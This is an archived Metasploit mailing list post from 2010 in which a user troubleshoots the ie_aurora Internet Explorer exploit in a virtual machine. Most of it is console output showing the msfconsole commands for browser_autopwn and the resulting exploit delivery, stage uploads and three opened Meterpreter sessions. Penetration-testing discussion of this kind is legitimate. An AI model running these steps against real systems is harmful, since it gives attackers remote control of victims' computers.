Metasploit mailing list archives

ie_aurora exploit problem.


From: Soporte Exocet <kirima () gmail com>
Date: Sat, 23 Jan 2010 19:41:29 -0300

in my vm aurora only work in autopwn mode:

msf exploit(ie_aurora) >
[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/5BRpT6eJetESYX0
[*]  Local IP: http://10.0.0.3:8080/5BRpT6eJetESYX0
[*] Server started.
[*] Started bind handler
[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client
10.0.0.3
[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client
10.0.0.3
[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client
10.0.0.3
[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client
10.0.0.3
[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client
10.0.0.3
[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client
10.0.0.3
^CtInterrupt: use the 'exit' command to quit
msf exploit(ie_aurora) > search autopwn
[*] Searching loaded modules for pattern 'autopwn'...

Auxiliary
=========

   Name                    Rank    Description
   ----                    ----    -----------
   server/browser_autopwn  normal  HTTP Client Automatic Exploiter

use msf exploit(ie_aurora) > use server/browser_autopwn
msf auxiliary(browser_autopwn) > exploit
[-] Auxiliary failed: Msf::OptionValidateError The following options failed
to validate: LHOST.
msf auxiliary(browser_autopwn) > set lhost 10.0.0.3
lhost => 10.0.0.3
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed
msf auxiliary(browser_autopwn) >
[-] WARNING: Database is disabled, using targetcache instead.
[-] Database support makes detection much more reliable against multiple
[-] hosts from the same IP; type 'db_create' to enable it.

[*] Starting exploit modules on host 10.0.0.3...
[*] ---
[*] --- Done, found 14 exploit modules

[-] WARNING: Database is disabled, using targetcache instead.
[-] Database support makes detection much more reliable against multiple
[-] hosts from the same IP; type 'db_create' to enable it.
[*] Responding with exploits
[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client
10.0.0.3
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.0.0.3:3333 -> 10.0.0.3:5506)
[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client
10.0.0.3
[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client
10.0.0.3
[*] Sending stage (725504 bytes)
[*] Meterpreter session 2 opened (10.0.0.3:3333 -> 10.0.0.3:5540)
[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client
10.0.0.3
[*] Sending stage (725504 bytes)
[*] Meterpreter session 3 opened (10.0.0.3:3333 -> 10.0.0.3:5542)
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: